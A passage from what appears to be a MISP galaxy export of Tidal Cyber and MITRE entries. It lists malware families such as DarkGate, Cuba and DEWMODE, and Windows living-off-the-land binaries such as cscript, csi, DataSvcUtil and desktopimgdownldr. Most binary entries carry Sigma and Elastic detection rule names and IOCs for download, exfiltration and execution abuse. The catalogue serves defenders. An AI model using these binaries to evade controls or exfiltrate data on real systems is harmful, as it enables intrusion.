Resources: * https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
Detection: * Sigma: proc_creation_win_csc_susp_parent.yml * Sigma: proc_creation_win_csc_susp_folder.yml * Elastic: defense_evasion_dotnet_compiler_parent_process.toml * Elastic: defense_evasion_execution_msbuild_started_unusal_process.toml * IOC: Csc.exe should normally not run as System account unless it is used for development.[Csc.exe - LOLBAS Project]
Internal MISP references
UUID 939eeb6b-3f74-43b6-8ead-644457ee7d78
which can be used as unique global reference for Csc
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5096 |
source | Tidal Cyber |
tags | ['2ee25dd6-256c-4659-b1b6-f5afc943ccc1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Cscript
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary used to execute scripts in Windows
Author: Oddvar Moe
Paths: * C:\Windows\System32\cscript.exe * C:\Windows\SysWOW64\cscript.exe
Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Detection: * Sigma: proc_creation_win_wscript_cscript_script_exec.yml * Sigma: file_event_win_net_cli_artefact.yml * Elastic: defense_evasion_unusual_dir_ads.toml * Elastic: command_and_control_remote_file_copy_scripts.toml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Splunk: wscript_or_cscript_suspicious_child_process.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Cscript.exe executing files from alternate data streams * IOC: DotNet CLR libraries loaded into cscript.exe * IOC: DotNet CLR Usage Log - cscript.exe.log[Cscript.exe - LOLBAS Project]
Internal MISP references
UUID 83036c61-d8cf-42f8-a9e5-dc3d26d75cdc
which can be used as unique global reference for Cscript
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5097 |
source | Tidal Cyber |
tags | ['7cae5f59-dbbf-406f-928d-118430d2bdd0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
csi
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Command line interface included with Visual Studio.
Author: Oddvar Moe
Paths: * c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe * c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
Resources: * https://twitter.com/subTee/status/781208810723549188 * https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
Detection: * Sigma: proc_creation_win_csi_execution.yml * Sigma: proc_creation_win_csi_use_of_csharp_console.yml * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[csi.exe - LOLBAS Project]
Internal MISP references
UUID a11e4ebf-59e4-4b79-8a20-be1618dfbaed
which can be used as unique global reference for csi
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5211 |
source | Tidal Cyber |
tags | ['86bb7f3c-652c-4f77-af2a-34677ff42315', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
CSPY Downloader
CSPY Downloader is a tool designed to evade analysis and download additional payloads used by Kimsuky.[Cybereason Kimsuky November 2020]
Internal MISP references
UUID eb481db6-d7ba-4873-a171-76a228c9eb97
which can be used as unique global reference for CSPY Downloader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0527 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Cuba
Cuba is a Windows-based ransomware family that has been used against financial institutions, technology, and logistics organizations in North and South America as well as Europe since at least December 2019.[McAfee Cuba April 2021]
Internal MISP references
UUID 095064c6-144e-4935-b878-f82151bc08e4
which can be used as unique global reference for Cuba
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0625 |
source | MITRE |
tags | ['89c5b94b-ecf4-4d53-9b74-3465086d4565', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '4bc9ab8f-7f57-4b1a-8857-ffaa7e5cc930', '17864218-bc4f-4564-8abf-97c988eea9f7', 'b6458e46-650e-4e96-8e68-8a9d70bcf045', 'bac51672-8240-4182-9087-23626023e509', 'c5c8f954-1bc0-45d5-9a4f-4385d0a720a1', '2743d495-7728-4a75-9e5f-b64854039792', 'd713747c-2d53-487e-9dac-259230f04460', 'fde4c246-7d2d-4d53-938b-44651cf273f1', '964c2590-4b52-48c6-afff-9a6d72e68908', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CustomShellHost
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: A host process that is used by custom shells when using Windows in Kiosk mode.
Author: Wietze Beukema
Paths: * C:\Windows\System32\CustomShellHost.exe
Resources: * https://twitter.com/YoSignals/status/1381353520088113154 * https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher
Detection: * IOC: CustomShellHost.exe is unlikely to run on normal workstations * Sigma: proc_creation_win_lolbin_customshellhost.yml[CustomShellHost.exe - LOLBAS Project]
Internal MISP references
UUID 3ff0d4fc-6678-42f0-869b-f48906d98f82
which can be used as unique global reference for CustomShellHost
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5098 |
source | Tidal Cyber |
tags | ['536c3d51-9fc4-445e-9723-e11b69f0d6d5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Cyclops Blink
Cyclops Blink is a modular malware that has been used in widespread campaigns by Sandworm Team since at least 2019 to target Small/Home Office (SOHO) network devices, including WatchGuard and Asus.[NCSC Cyclops Blink February 2022][NCSC CISA Cyclops Blink Advisory February 2022][Trend Micro Cyclops Blink March 2022]
Internal MISP references
UUID 68792756-7dbf-41fd-8d48-ac3cc2b52712
which can be used as unique global reference for Cyclops Blink
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S0687 |
source | MITRE |
tags | ['b20e7912-6a8d-46e3-8e13-9a3fc4813852', 'e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Dacls
Dacls is a multi-platform remote access tool used by Lazarus Group since at least December 2019.[TrendMicro macOS Dacls May 2020][SentinelOne Lazarus macOS July 2020]
Internal MISP references
UUID 9d521c18-09f0-47be-bfe5-e1bf26f7b928
which can be used as unique global reference for Dacls
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'macOS', 'Windows'] |
software_attack_id | S0497 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DanBot
DanBot is a first-stage remote access Trojan written in C# that has been used by HEXANE since at least 2018.[SecureWorks August 2019]
Internal MISP references
UUID 131c0eb2-9191-4ccd-a2d6-5f36046a8f2f
which can be used as unique global reference for DanBot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1014 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DarkComet
DarkComet is a Windows remote administration tool and backdoor.[TrendMicro DarkComet Sept 2014][Malwarebytes DarkComet March 2018]
Internal MISP references
UUID 74f88899-56d0-4de8-97de-539b3590ab90
which can be used as unique global reference for DarkComet
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0334 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DarkGate - Duplicate
DarkGate first emerged in 2018 and has evolved into an initial access and data gathering tool associated with various criminal cyber operations. Written in Delphi and named "DarkGate" by its author, DarkGate is associated with credential theft, cryptomining, cryptotheft, and pre-ransomware actions.[Ensilo Darkgate 2018] DarkGate use increased significantly starting in 2022 and is under active development by its author, who provides it as a Malware-as-a-Service offering.[Trellix Darkgate 2023]
Internal MISP references
UUID 39d81c48-8f7c-54cb-8fac-485598e31a55
which can be used as unique global reference for DarkGate - Duplicate
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1111 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DarkGate
DarkGate is a commodity downloader. Researchers have often observed DarkGate samples making use of legitimate copies of AutoIt, a freeware BASIC-like scripting language, using it to run AutoIt scripts as part of its execution chain. Reports of DarkGate infections surged following the announcement of the disruption of the QakBot botnet by international authorities in late August 2023.[Bleeping Computer DarkGate October 14 2023] The delivery of DarkGate payloads via instant messaging platforms including Microsoft Teams and Skype was reported in September and October 2023.[DarkGate Loader delivered via Teams - Truesec][Trend Micro DarkGate October 12 2023]
Internal MISP references
UUID 7144b703-f471-4bde-bedc-e8b274854de5
which can be used as unique global reference for DarkGate
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5266 |
source | Tidal Cyber |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DarkTortilla
DarkTortilla is a highly configurable .NET-based crypter that has possibly been active since at least August 2015. DarkTortilla has been used to deliver popular information stealers, RATs, and payloads such as Agent Tesla, AsyncRat, NanoCore, RedLine, Cobalt Strike, and Metasploit.[Secureworks DarkTortilla Aug 2022]
Internal MISP references
UUID 35abcb6b-3259-57c1-94fc-50cfd5bde786
which can be used as unique global reference for DarkTortilla
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1066 |
source | MITRE |
type | ['malware'] |
DarkWatchman
DarkWatchman is a lightweight JavaScript-based remote access tool (RAT) that avoids file operations; it was first observed in November 2021.[Prevailion DarkWatchman 2021]
Internal MISP references
UUID 740a0327-4caf-4d90-8b51-f3f9a4d59b37
which can be used as unique global reference for DarkWatchman
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0673 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Daserf
Daserf is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi. [Trend Micro Daserf Nov 2017] [Secureworks BRONZE BUTLER Oct 2017]
Internal MISP references
UUID fad65026-57c4-4d4f-8803-87178dd4b887
which can be used as unique global reference for Daserf
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0187 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DataSvcUtil
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.
Author: Ialle Teixeira
Paths: * C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe
Resources: * https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe * https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services * https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services
Detection: * Sigma: proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml * IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory. * IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS. * IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.[DataSvcUtil.exe - LOLBAS Project]
Internal MISP references
UUID dd555a4c-3b04-48c1-988f-d530d699a5bf
which can be used as unique global reference for DataSvcUtil
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5099 |
source | Tidal Cyber |
tags | ['0576be43-65c6-4d1a-8a06-ed8232ca0120', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
DBatLoader
DBatLoader is malware used to download and drop additional payloads.
Internal MISP references
UUID 789791b7-1ea1-4b18-8253-4663bb7ec143
which can be used as unique global reference for DBatLoader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5287 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
DCSrv
DCSrv is destructive malware that has been used by Moses Staff since at least September 2021. Though DCSrv has ransomware-like capabilities, Moses Staff does not demand ransom or offer a decryption key.[Checkpoint MosesStaff Nov 2021]
Internal MISP references
UUID 26ae3cd1-6710-4807-b674-957bd67d3e76
which can be used as unique global reference for DCSrv
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1033 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DDKONG
DDKONG is a malware sample that was part of a campaign by Rancor. DDKONG was first seen used in February 2017. [Rancor Unit42 June 2018]
Internal MISP references
UUID 0657b804-a889-400a-97d7-a4989809a623
which can be used as unique global reference for DDKONG
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0255 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DEADEYE
DEADEYE is a malware launcher that has been used by APT41 since at least May 2021. DEADEYE has variants that can either embed a payload inside a compiled binary (DEADEYE.EMBED) or append it to the end of a file (DEADEYE.APPEND).[Mandiant APT41]
Internal MISP references
UUID e9533664-90c5-5b40-a40e-a69a2eda8bc9
which can be used as unique global reference for DEADEYE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1052 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
DealersChoice
DealersChoice is a Flash exploitation framework used by APT28. [Sofacy DealersChoice]
Internal MISP references
UUID 64dc5d44-2304-4875-b517-316ab98512c2
which can be used as unique global reference for DealersChoice
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0243 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
DEATHRANSOM
DEATHRANSOM is ransomware written in C that has been used since at least 2020, and has potential overlap with FIVEHANDS and HELLOKITTY.[FireEye FiveHands April 2021]
Internal MISP references
UUID 832f5ab1-1267-40c9-84ef-f32d6373be4e
which can be used as unique global reference for DEATHRANSOM
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0616 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
DefaultPack
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: This binary can be downloaded alongside multiple software downloads on the Microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.
Author: @checkymander
Paths: * C:\Program Files (x86)\Microsoft\DefaultPack\
Resources: * https://twitter.com/checkymander/status/1311509470275604480.
Detection: * Sigma: proc_creation_win_lolbin_defaultpack.yml * IOC: DefaultPack.EXE spawned an unknown process[DefaultPack.EXE - LOLBAS Project]
Internal MISP references
UUID ff25ec03-1e8d-427e-b207-1e1ecca542ec
which can be used as unique global reference for DefaultPack
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5212 |
source | Tidal Cyber |
tags | ['4f7be515-680e-4375-81f6-c71c83dd440d', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Defender Control
Defender Control is a tool purpose-built to disable Microsoft Defender.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID e8830cf3-53f3-4d15-858c-584589405fad
which can be used as unique global reference for Defender Control
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5029 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Denis
Denis is a Windows backdoor and Trojan used by APT32. Denis shares several similarities to the SOUNDBITE backdoor and has been used in conjunction with the Goopy backdoor.[Cybereason Oceanlotus May 2017]
Internal MISP references
UUID df4002d2-f557-4f95-af7a-9a4582fb7068
which can be used as unique global reference for Denis
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0354 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Denonia
Denonia is described as "the first malware specifically targeting Lambda", the AWS serverless computing platform. Early samples appeared to possess cryptomining capabilities, but researchers believe Denonia could be used to carry out other types of activities as well.[Cado Denonia April 3 2022]
Internal MISP references
UUID 3c14ea0a-c85f-41b3-acd0-15d2565e3e07
which can be used as unique global reference for Denonia
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['IaaS'] |
software_attack_id | S5313 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2e5f6e4a-4579-46f7-9997-6923180815dd', '8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Derusbi
Derusbi is malware used by multiple Chinese APT groups.[Novetta-Axiom][ThreatConnect Anthem] Both Windows and Linux variants have been observed.[Fidelis Turbo]
Internal MISP references
UUID 9222aa77-922e-43c7-89ad-71067c428fb2
which can be used as unique global reference for Derusbi
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0021 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Desk
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Desktop Settings Control Panel
Author: Hai Vaknin
Paths: * C:\Windows\System32\desk.cpl * C:\Windows\SysWOW64\desk.cpl
Resources: * https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt * https://twitter.com/pabraeken/status/998627081360695297 * https://twitter.com/VakninHai/status/1517027824984547329 * https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files
Detection: * Sigma: file_event_win_new_src_file.yml * Sigma: proc_creation_win_lolbin_rundll32_installscreensaver.yml * Sigma: registry_set_scr_file_executed_by_rundll32.yml[Desk.cpl - LOLBAS Project]
Internal MISP references
UUID 1863a7e2-6212-48a0-b109-15d0198b93e2
which can be used as unique global reference for Desk
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5188 |
source | Tidal Cyber |
tags | ['7ad2b1d5-c228-4bf5-bf8e-c80a8fef0079', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Desktopimgdownldr
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows binary used to configure lockscreen/desktop image
Author: Gal Kristal
Paths: * c:\windows\system32\desktopimgdownldr.exe
Resources: * https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
Detection: * Sigma: proc_creation_win_desktopimgdownldr_susp_execution.yml * Sigma: file_event_win_susp_desktopimgdownldr_file.yml * Elastic: command_and_control_remote_file_copy_desktopimgdownldr.toml * IOC: desktopimgdownldr.exe that creates non-image file * IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl[Desktopimgdownldr.exe - LOLBAS Project]
Internal MISP references
UUID 1b31652d-30bb-4c6e-bfe1-f2921a0aa64e
which can be used as unique global reference for Desktopimgdownldr
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5100 |
source | Tidal Cyber |
tags | ['acc0e091-a071-4e83-b0b1-4f3adebeafa3', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
DeviceCredentialDeployment
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Device Credential Deployment
Author: Elliot Killick
Paths: * C:\Windows\System32\DeviceCredentialDeployment.exe
Resources: None Provided
Detection: * IOC: DeviceCredentialDeployment.exe should not be run on a normal workstation * Sigma: proc_creation_win_lolbin_device_credential_deployment.yml[DeviceCredentialDeployment.exe - LOLBAS Project]
Internal MISP references
UUID b99bdf39-8dcf-4bae-95af-b029d48cb579
which can be used as unique global reference for DeviceCredentialDeployment
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5101 |
source | Tidal Cyber |
tags | ['2a08c2eb-e90e-4bdb-a2dd-9da06de7ed25', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Devinit
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Visual Studio 2019 tool
Author: mr.d0x
Paths: * C:\Program Files\Microsoft Visual Studio*\Community\Common7\Tools\devinit\devinit.exe * C:\Program Files (x86)\Microsoft Visual Studio*\Community\Common7\Tools\devinit\devinit.exe
Resources: * https://twitter.com/mrd0x/status/1460815932402679809
Detection: * Sigma: proc_creation_win_devinit_lolbin_usage.yml[Devinit.exe - LOLBAS Project]
Internal MISP references
UUID 102714a0-6b18-4d05-83c2-dd2929ce685a
which can be used as unique global reference for Devinit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5213 |
source | Tidal Cyber |
tags | ['bb814941-0155-49b1-8f93-39626d4f0ddd', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Devtoolslauncher
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary will execute specified binary. Part of VS/VScode installation.
Author: felamos
Paths: * c:\windows\system32\devtoolslauncher.exe
Resources: * https://twitter.com/_felamos/status/1179811992841797632
Detection: * Sigma: proc_creation_win_lolbin_devtoolslauncher.yml * IOC: DeveloperToolsSvc.exe spawned an unknown process[Devtoolslauncher.exe - LOLBAS Project]
Internal MISP references
UUID 6e213e33-c2e5-494f-bc1a-bf672f95dcf8
which can be used as unique global reference for Devtoolslauncher
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5214 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
devtunnel
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary to enable forwarded ports on Windows operating systems.
Author: Kamran Saifullah
Paths: * C:\Users\
Resources: * https://code.visualstudio.com/docs/editor/port-forwarding
Detection: * IOC: devtunnel.exe binary spawned * IOC: .devtunnels.ms * IOC: .*.devtunnels.ms * Analysis: https://cydefops.com/vscode-data-exfiltration[devtunnel.exe - LOLBAS Project]
Internal MISP references
UUID 672d80fe-656e-4b1b-8234-ebf2c5339166
which can be used as unique global reference for devtunnel
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5252 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
DEWMODE
According to joint Cybersecurity Advisory AA23-158A (June 2023), DEWMODE is a web shell written in PHP that is designed to interact with a MySQL database. During a campaign from 2020 to 2021, threat actors exploited multiple zero-day vulnerabilities in internet-facing Accellion File Transfer Appliance (FTA) devices, installing DEWMODE web shells to exfiltrate data from compromised networks.[Mandiant MOVEit Transfer June 2 2023]
Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode
Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/dewmode/
Internal MISP references
UUID ff0b0792-5dd0-4e10-8b84-8da93a0198aa
which can be used as unique global reference for DEWMODE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux'] |
software_attack_id | S5021 |
source | Tidal Cyber |
tags | ['a98d7a43-f227-478e-81de-e7299639a355', '311abf64-a9cc-4c6a-b778-32c5df5658be'] |
type | ['malware'] |
Dfshim
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: ClickOnce engine in Windows used by .NET
Author: Oddvar Moe
Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Resources: * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf * https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Dfshim.dll - LOLBAS Project]
Internal MISP references
UUID b396eb52-3b6a-44e9-9534-d8b981a52192
which can be used as unique global reference for Dfshim
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5189 |
source | Tidal Cyber |
tags | ['91fd24c3-f371-4c3b-b997-cd85e25c0967', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Dfsvc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: ClickOnce engine in Windows used by .NET
Author: Oddvar Moe
